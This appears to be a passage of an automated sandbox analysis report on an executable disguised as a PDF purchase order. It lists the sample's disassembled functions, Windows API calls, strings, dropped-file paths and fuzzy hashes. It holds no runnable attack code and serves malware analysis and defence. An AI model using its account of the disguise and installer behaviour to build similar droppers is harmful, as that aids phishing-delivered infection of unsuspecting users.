                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                              • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                              • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                              • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                            • API String ID: 2624150263-3131679198
                                                                                                            • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                            • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                            • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                            • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                            • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                            • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                            • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                            • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                            • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                            • GetSysColor.USER32(?), ref: 00404396
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                            • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                            • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                            • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                            • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: -B@$Call$N$open
                                                                                                            • API String ID: 3615053054-1446803726
                                                                                                            • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                            • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                            • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                            • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                            • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                            • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                            • wsprintfA.USER32 ref: 00405DFB
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                            • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                                                            • API String ID: 222337774-899692902
                                                                                                            • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                            • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                            • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                            • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID: @Hmu
                                                                                                            • API String ID: 4216380887-887474944
                                                                                                            • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                            • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                            • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                            • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                            • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                            • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                            Strings
                                                                                                            • *?|<>/":, xrefs: 0040633B
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                            • "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 0040632D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-3160791963
                                                                                                            • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                            • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                            • GetSysColor.USER32(?), ref: 004041E4
                                                                                                            • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                            • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                            • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                            • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                            • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                            • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                            • GetMessagePos.USER32 ref: 00404AA1
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
